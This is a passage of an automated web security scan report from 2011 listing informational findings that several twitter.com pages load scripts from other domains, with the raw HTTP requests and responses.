Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:27:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664069-26968-14369
ETag: "f6e2c1ad980b6e6e373368d1a9180d90"
Last-Modified: Wed, 02 Feb 2011 16:27:49 GMT
X-Runtime: 0.01304
Content-Type: text/html; charset=utf-8
Content-Length: 43059
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.320. http://twitter.com/qianam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/qianam

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /qianam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570797-79649-25731
ETag: "6a1b58c730c5ce80e60e0bdaf3239ea2"
Last-Modified: Tue, 01 Feb 2011 14:33:17 GMT
X-Runtime: 0.01298
Content-Type: text/html; charset=utf-8
Content-Length: 56209
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570797885016; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079790164862; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTBlN2VlZWExZGU0MWVmMjhhZGFkMGZmNTI1NjBmNzFlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIT0%252Bk4S0B--fdd7d7f34f7fc82c819ff96f72fe018f82127c14; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.321. http://twitter.com/qianam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/qianam

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /qianam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664126-79624-8622
ETag: "2e4de2c0b3c4d2c07fead9811c9d67b0"
Last-Modified: Wed, 02 Feb 2011 16:28:46 GMT
X-Runtime: 0.01228
Content-Type: text/html; charset=utf-8
Content-Length: 56572
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.322. http://twitter.com/rosyresources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rosyresources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560
http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560
http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rosyresources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570800-89824-7199
ETag: "a6a597f3ba9c55bb6fc04cfce59dc9f9"
Last-Modified: Tue, 01 Feb 2011 14:33:20 GMT
X-Runtime: 0.01954
Content-Type: text/html; charset=utf-8
Content-Length: 49430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570800095954; path=/; expires=Tue, 08-Feb-11 14:33:20 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657080010985701; path=/; expires=Thu, 03 Mar 2011 14:33:20 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTZmMzIyN2Q2ZDU4YjUxNDg1ODIxYTVlNGIxZTFjZmU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8Fek4S0B--3e8ab80412a1832934d5b0c95fbe9e0537185fe8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560" type="text/javascript"></script>
...[SNIP]...

18.323. http://twitter.com/rosyresources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rosyresources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rosyresources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664186-81735-42265
ETag: "806633e78918146927a296b5b6eddf84"
Last-Modified: Wed, 02 Feb 2011 16:29:46 GMT
X-Runtime: 0.00743
Content-Type: text/html; charset=utf-8
Content-Length: 49430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.324. http://twitter.com/sarahdessen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sarahdessen

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664280-32194-27142
ETag: "d3fbce8453a7e3206514989e5df7c7d0"
Last-Modified: Wed, 02 Feb 2011 16:31:20 GMT
X-Runtime: 0.02307
Content-Type: text/html; charset=utf-8
Content-Length: 47387
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.325. http://twitter.com/science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/science

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664268-93135-45678
ETag: "9835266cf99864f5edcf6b201fcbb12b"
Last-Modified: Wed, 02 Feb 2011 16:31:08 GMT
X-Runtime: 0.01240
Content-Type: text/html; charset=utf-8
Content-Length: 51432
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.326. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.327. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.328. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.329. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a2.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.330. http://twitter.com/sethmeyers21 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sethmeyers21

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664282-42189-57855
ETag: "0a7d09e5544d525faea7e47c5f5e9c5b"
Last-Modified: Wed, 02 Feb 2011 16:31:22 GMT
